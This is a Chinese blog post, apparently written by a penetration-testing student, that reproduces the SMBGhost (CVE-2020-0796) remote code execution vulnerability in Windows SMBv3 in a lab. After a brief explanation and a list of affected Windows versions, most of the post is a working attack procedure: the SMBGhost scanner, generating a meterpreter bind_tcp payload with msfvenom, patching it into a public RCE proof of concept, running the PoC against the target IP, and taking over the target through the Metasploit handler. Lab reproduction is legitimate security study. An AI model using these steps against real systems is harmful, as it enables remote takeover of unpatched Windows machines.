CVE-2020-0796永恒之黑漏洞复现


Microsoft服务器消息块(SMB)协议是Microsoft Windows中使用的一项Microsoft网络文件共享协议。在大部分windows系统中都是默认开启的,用于在计算机间共享文件、打印机等。Windows 10和Windows Server 2016引入了SMB 3.1.1 。本次漏洞源于SMBv3没有正确处理压缩的数据包,在解压数据包的时候使用客户端传过来的长度进行解压时,并没有检查长度是否合法,最终导致整数溢出。利用该漏洞,黑客可直接远程攻击SMB服务端远程执行任意恶意代码,亦可通过构建恶意SMB服务端诱导客户端连接从而大规模攻击客户端。

这是我在实验室学习渗透测试所做的第十八个漏洞复现。

影响范围

  • Windows 10 Version 1903 for 32-bit Systems
  • Windows 10 Version 1903 for x64-based Systems
  • Windows 10 Version 1903 for ARM64-based Systems
  • Windows Server, Version 1903 (Server Core installation)
  • Windows 10 Version 1909 for 32-bit Systems
  • Windows 10 Version 1909 for x64-based Systems
  • Windows 10 Version 1909 for ARM64-based Systems
  • Windows Server, Version 1909 (Server Core installation)

实验环境

攻击机:Kali Linux 192.168.227.128

靶机:Windows 10 x64 1903 192.168.227.147

复现过程

1. 环境配置

确保windows虚拟机在影响范围内。

在攻击机上安装python3.6或者以上的版本,下载漏洞检测工具SMBGhost,确保漏洞存在。

git clone https://github.com/ollypwn/SMBGhost.git
cd SMBGhost
python3 scanner.py 靶机IP

2. 使用msf生成木马

msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 -b '\x00' -i 1 -f python>exploit.py

生成的exploit.py即为木马文件。

3. 安装POC,配置exploit.py

git clone https://github.com/chompie1337/SMBGhost_RCE_PoC.git
cd SMBGhost_RCE_PoC

首先打开刚才使用msf生成的exploit.py,将每行最前面的buf替换成USER_PAYLOAD,然后全部复制,打开POC中的exploit.py,找到USER_PAYLOAD,替换为刚才复制的内容。

完成后,运行poc。

python3 exploit.py -ip 靶机IP

4. msf攻击

启动msf监听本地端口,获得靶机权限,攻击成功。

msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set  rhost 靶机IP
run

文章作者: 恰醋
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 恰醋 !
评论
 上一篇
CVE-2016-0051 WebDAV漏洞复现 CVE-2016-0051 WebDAV漏洞复现
Microsoft Web 分布式创作和版本管理 (WebDAV)存在权限提升漏洞,成功利用此漏洞的攻击者可以执行任意代码。
2020-10-10
下一篇 
CVE-2017-11882漏洞复现 CVE-2017-11882漏洞复现
此漏洞是由Office软件里面的公式编辑器造成的,由于编辑器进程没有对名称长度进行校验,导致缓冲区溢出,攻击者通过构造特殊的字符,可以实现任意代码执行。
2020-10-07
  目录